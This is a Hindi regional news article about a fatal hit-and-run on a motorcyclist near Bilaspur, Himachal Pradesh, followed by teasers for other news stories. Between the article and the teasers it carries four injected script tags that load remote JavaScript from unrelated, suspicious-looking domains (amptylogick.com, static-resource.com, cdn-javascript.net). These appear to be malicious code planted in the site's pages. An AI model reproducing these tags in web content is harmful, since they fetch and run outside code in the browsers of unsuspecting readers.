<p>जिला बिलासपुर में पुलिस थाना सदर के पास लगते चंडीगढ़-मनाली एनएच पर सड़क हादसे में एक युवक की मौत हो गई। मृतक की पहचान निवासी गांव राजपुरा के रुप में हुई है। देर रात को 11 बजे के करीब पवन बाइक पर सवार होकर नौणी से अपने घर की तरफ जा रहा था। तभी रास्ते में एक अज्ञात वाहन ने बाइक सवार को टक्कर मार दी। जिससे उसके सिर पर गहरी चोट आई। टक्कर मारने के बाद अज्ञात वाहन चालक मौके से भाग गया।</p>
<p>जानकारी के अनुसार बीती रात पवन कुमार नौणी से अपने घर की तरफ जा रहा था कि तभी एक ढाबे वाले ने उसकी जोर से चीखने की आवाज सुनी। जब ढाबे वाला उसके पास पहुंचा तो वो एक व्यक्ति बाइक से नीचे गिरा हुआ था। उसके सिर पर गहरी चोट थी। ढाबे वाले ने इसकी सूचना सदर पुलिस को दी। जिसके बाद पुलिस ने मौके पर पहुंच कर युवक को जिला अस्पताल पहुंचाया। लेकिन सिर पर गहरी चोट आने के कारण युवक को आईजीएमसी रेफर कर दिया गया। जहां पर युवक ने दम तोड़ दिया।</p>
<p>पुलिस ने मृतक का पोस्टमार्टम करवाकर शव परिजनों को सौंप दिया है। डीएसपी बिलासपुर संजय शर्मा ने बताया कि देर रात नौणी से एक किलोमीटर आगे सड़क हादसा हुआ था। जिसमें 30 साल का युवक जख्मी हुआ था। पुलिस ने मामला दर्ज़ कर लिया है। हादसे के कारणों की जांच करने में जुट गई है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1574918796877″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
हिमाचल प्रदेश के चंबा जिले के मतियारा गांव में शादी का माहौल उस समय मातम…
Satoun School hockey achievement : सतोन पी एम श्री राजकीय वरिष्ठ माध्यमिक पाठशाला की छात्राओं…
Samarth campaign disaster preparedness: हिमाचल प्रदेश के आपदा प्रबंधन विभाग द्वारा आपदा से निपटने के…
Rainfall Deficit 2024: मानसून की विदाई के बाद हिमाचल प्रदेश में अक्टूबर के पहले 13…
Water Guards Promotion 2024: जलशक्ति विभाग में 12 साल का सेवाकाल पूरा कर चुके 184…
Mumbai: महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…